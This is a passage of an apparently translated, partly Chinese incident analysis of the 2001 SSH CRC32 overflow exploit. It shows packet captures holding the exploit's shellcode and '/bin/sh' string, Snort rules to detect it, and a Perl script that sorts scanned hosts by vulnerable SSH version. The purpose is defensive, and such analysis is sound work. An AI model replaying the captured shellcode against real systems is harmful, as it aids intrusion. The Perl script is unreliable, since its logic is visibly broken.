....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3 ......3!......3$......3%......
3(......3)......3,......3-......30......31......34......35......38....
..39......3<......3=......3@......3A......3D......3E......3H......3I..
....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
......3]......3`......3a......3d........1...p}.@

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......3i......3l......3m......3p......3q......3t......3u......3x......
3y......3|......3}......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......3.......3.......3.......
3.......3.......3.......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
....4)......4,......4-......40......41......44......45......48......49
......4<......4=......4@......4A......4D......4E......4H......4I......
4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
..4]......4`......4a......4d......4e......4h......4i......4l......4m..
....4p......4q......4t......4u......4x......4y......4|......4}......4.
......4.......4.......4.......4.......4.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4.......4.......4.......4.......4...
....4.......4.......4.......4.......4.......4.......4.......4.......4.
......4.......4.......4.......4.........1...p}.@

. . .

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......................................................................
......................................................................
......................................................................
......................................................................

......................................................................
......................................................................
......................................................................
......................................................................
.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
./bin/sh.h0h0h0, 7350, zip/TESO!......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这样针对这个攻击程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。

下面的特征字符串由Marty Roesch 和 Brian Caswell开发并可使用在Snort v1.8 或者
更高的版本[6]：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
　 (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
　 flags:A+; content:"/bin/sh"; \
　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
　 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
　 (msg:"EXPLOIT ssh CRC32 overflow filler"; \
　 flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
　 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
　 (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
　 flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
　 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
　 (msg:"EXPLOIT ssh CRC32 overflow"; \
　 flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
　 content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
　 classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

鉴别你的主机是否存在此漏洞
===========================

你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]
写的脚本来鉴别SSH服务和它们的版本。

Russell Fulton 也公布了一个脚本程序Argus[10]用来处理日志，包含在下面的附录中。

----------------------------------------------------------------------------

参考

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
　 http://www.all.net/ForensiX/plac.html

[2] Netcat, by der Hobbit
　 http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool
　 http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] LiSt Open Files (lsof)
　 http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter
　 http://www.packetfactory.net/projects/ngrep/

[6] Snort
　 http://www.snort.org/

[7] 7350.org / 7350
　 http://www.7350.org/
　 http://www.team-teso.org/about.php (see the bottom)

[8] Jeremy Mates 提供的ssh_scan.pl
　 http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] Niels Provos提供的ScanSSH 扫描程序
　 http://www.monkey.org/~provos/scanssh/

[10] Argus - 网络传输审核工具
　 http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump
　 http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay
　 http://packages.debian.org/testing/net/tcpreplay.html

Appendix A
==========

两个扫描脚本如下

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script Operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"

# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is oBTained, or if new
# versions of the SSH server are found on your network.

%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'not affected',
'SSH-1.5-1.2.17', 'not affected',
'SSH-1.5-1.2.18', 'not affected',
'SSH-1.5-1.2.19', 'not affected',
'SSH-1.5-1.2.20', 'not affected',
'SSH-1.5-1.2.21', 'not affected',
'SSH-1.5-1.2.22', 'not affected',
'SSH-1.5-1.2.23', 'not affected',
'SSH-1.5-1.2.24', 'affected',
'SSH-1.5-1.2.25', 'affected',
'SSH-1.5-1.2.26', 'affected',
'SSH-1.5-1.2.27', 'affected',
'SSH-1.5-1.2.28', 'affected',
'SSH-1.5-1.2.29', 'affected',
'SSH-1.5-1.2.30', 'affected',
'SSH-1.5-1.2.31', 'affected',
'SSH-1.5-1.2.31a', 'not affected',
'SSH-1.5-1.2.32', 'not affected',
'SSH-1.5-1.3.7', 'not affected',
'SSH-1.5-Cisco-1.25', 'unknown',
'SSH-1.5-OSU_1.5alpha1', 'unknown',
'SSH-1.5-OpenSSH-1.2', 'affected',
'SSH-1.5-OpenSSH-1.2.1', 'affected',
'SSH-1.5-OpenSSH-1.2.2', 'affected',
'SSH-1.5-OpenSSH-1.2.3', 'affected',
'SSH-1.5-OpenSSH_2.5.1', 'not affected',
'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p2', 'not affected',
'SSH-1.5-RemotelyAnywhere', 'not affected',
'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
'SSH-1.99-OpenSSH-2.1', 'affected',
'SSH-1.99-OpenSSH_2.1.1', 'affected',
'SSH-1.99-OpenSSH_2.2.0', 'affected',
'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
'SSH-1.99-OpenSSH_2.3.0', 'not affected',
'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
'SSH-1.99-OpenSSH_2.9', 'not affected',
'SSH-1.99-OpenSSH_2.9p1', 'not affected',
'SSH-1.99-OpenSSH_2.9p2', 'not affected',
'SSH-1.99-OpenSSH_3.0p1', 'not affected',
'SSH-2.0-1.1.1', 'unknown',
'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
'SSH-2.0-OpenSSH_2.9p2', 'not affected',
);

# Make SURE you read the code first.
&IKnowWhatImDoing();

$all++, shift(@ARGV) if $ARGV[0] eq "-a";

while (<>) {
　　　 chop;
　　　 s/\s+/ /g;
　　　 ($ip, $host, $version) = split(' ', $_);

　　　 # Adjust this to identify other strings reported
　　　 # by servers that have access restrictions, etc.
　　　 # in place and do not show a specific version number.
　　　 # They all fall under the category "Unknown" in this case.
　　　 $version = "Unknown"
　　　　　　　 if ($version eq "Couldn't" ||
　　　　　　　　　 $version eq "Unknown" ||
　　　　　　　　　 $version eq "You" ||
　　　　　　　　　 $version eq "timeout");

　　　 $server = $host;
}

foreach $i (sort keys %server) {
　　　 ($version,$ip) = split(":", $i);
　　　 next if ($affected eq "not affected" && ! $all);
　　　 printf("\n\n%s (%s)\n", $version, $affected)
　　　　　　　 if ($curver ne $version);
　　　 $curver = $version;
　　　 print " " . $server . "($ip)\n";
}

exit(0);

sub IKnowWhatImDoing {
　　　 local $IKnowWhatImDoing = 0;

　　　 # Uncomment the following line to make this script work.
　　　 # $IKnowWhatImDoing++;
　　　 die "I told you to read the code first, didn't I?\n"
　　　　　　　 unless $IKnowWhatImDoing;
　　　 return;
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=